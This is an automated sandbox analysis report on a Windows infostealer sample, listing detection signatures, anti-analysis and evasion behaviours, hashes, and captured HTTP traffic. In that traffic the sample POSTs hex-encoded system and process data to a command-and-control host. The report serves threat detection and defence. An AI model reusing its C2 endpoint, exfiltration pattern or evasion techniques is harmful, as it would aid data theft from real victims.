Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JbN2WYseAr.exe

Overview

General Information

Sample name:JbN2WYseAr.exe
renamed because original name is a hash value
Original sample name:3168cdb0691e91fc0109d3d5e854b7b1.exe
Analysis ID:1582704
MD5:3168cdb0691e91fc0109d3d5e854b7b1
SHA1:b29e09e7a8545b5471027b9b2a7e893e5266d727
SHA256:4ba12035398519562e56cf4b0a0a2e9dae54ec66ee9d54fc474d3e5fff8bef4f
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • JbN2WYseAr.exe (PID: 8044 cmdline: "C:\Users\user\Desktop\JbN2WYseAr.exe" MD5: 3168CDB0691E91FC0109D3D5E854B7B1)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: JbN2WYseAr.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: JbN2WYseAr.exeReversingLabs: Detection: 60%
Source: JbN2WYseAr.exeVirustotal: Detection: 56%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: JbN2WYseAr.exeJoe Sandbox ML: detected
Source: JbN2WYseAr.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_0048A5B0
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0048A7F0
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0048A7F0
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0048A7F0
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0048A7F0
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0048A7F0
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0048A7F0
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0048B560
Source: JbN2WYseAr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_0042255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0042255D
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_004229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004229FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1Host: home.fiveth5vs.topAccept: */*Content-Type: application/jsonContent-Length: 442563Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 34 33 34 31 31 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1Host: home.fiveth5vs.topAccept: */*
Source: global trafficHTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1Host: home.fiveth5vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_004EA8C0 recvfrom,0_2_004EA8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1Host: home.fiveth5vs.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5vs.top
Source: unknownHTTP traffic detected: POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1Host: home.fiveth5vs.topAccept: */*Content-Type: application/jsonContent-Length: 442563Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 34 33 34 31 31 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 31 Dec 2024 08:51:19 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 31 Dec 2024 08:51:21 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17
Source: JbN2WYseAr.exe, 00000000.00000003.1420555421.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1420841859.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1442340740.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737
Source: JbN2WYseAr.exe, 00000000.00000003.1420555421.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1420841859.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1442340740.00000000016F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4
Source: JbN2WYseAr.exe, 00000000.00000003.1420841859.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1442340740.00000000016E4000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1420555421.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0
Source: JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl
Source: JbN2WYseAr.exe, 00000000.00000003.1420555421.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1420841859.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1442340740.00000000016F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737lse
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: JbN2WYseAr.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: JbN2WYseAr.exe, JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703

System Summary

barindex
PE file contains section with special chars
Source: JbN2WYseAr.exeStatic PE information: section name:
Source: JbN2WYseAr.exeStatic PE information: section name: .idata
Source: JbN2WYseAr.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A9670_3_0174A967
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A9670_3_0174A967
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A9670_3_0174A967
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749E6B0_3_01749E6B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749E6B0_3_01749E6B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749E6B0_3_01749E6B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749EEA0_3_01749EEA
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749EEA0_3_01749EEA
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749EEA0_3_01749EEA
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A9670_3_0174A967
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A9670_3_0174A967
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A9670_3_0174A967
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749E6B0_3_01749E6B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749E6B0_3_01749E6B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749E6B0_3_01749E6B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749EEA0_3_01749EEA
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749EEA0_3_01749EEA
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749EEA0_3_01749EEA
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A9670_3_0174A967
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A9670_3_0174A967
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A9670_3_0174A967
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749E6B0_3_01749E6B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749E6B0_3_01749E6B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749E6B0_3_01749E6B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749EEA0_3_01749EEA
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749EEA0_3_01749EEA
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749EEA0_3_01749EEA
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A9670_3_0174A967
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A9670_3_0174A967
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A9670_3_0174A967
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749E6B0_3_01749E6B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749E6B0_3_01749E6B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749E6B0_3_01749E6B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749EEA0_3_01749EEA
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749EEA0_3_01749EEA
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01749EEA0_3_01749EEA
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_004305B00_2_004305B0
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_00436FA00_2_00436FA0
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_0045F1000_2_0045F100
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_004EB1800_2_004EB180
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_007AE0500_2_007AE050
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_007AA0000_2_007AA000
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_004F00E00_2_004F00E0
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_004862100_2_00486210
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_004EC3200_2_004EC320
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_007744100_2_00774410
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_004F04200_2_004F0420
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_0042E6200_2_0042E620
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_004EC7700_2_004EC770
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_007867300_2_00786730
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_0048A7F00_2_0048A7F0
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_007A47800_2_007A4780
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_004349400_2_00434940
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_0042A9600_2_0042A960
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_004DC9000_2_004DC900
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_005F6AC00_2_005F6AC0
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_006DAAC00_2_006DAAC0
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_005B4B600_2_005B4B60
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_006DAB2C0_2_006DAB2C
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_00798BF00_2_00798BF0
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_0042CBB00_2_0042CBB0
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_007ACC900_2_007ACC90
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_007A4D400_2_007A4D40
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_005E0D800_2_005E0D80
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_0079CD800_2_0079CD80
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_0073AE300_2_0073AE30
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_00444F700_2_00444F70
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_004EEF900_2_004EEF90
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_004E8F900_2_004E8F90
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_00772F900_2_00772F90
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_004310E60_2_004310E6
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_0078D4300_2_0078D430
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_007935B00_2_007935B0
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_007B17A00_2_007B17A0
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_004D98800_2_004D9880
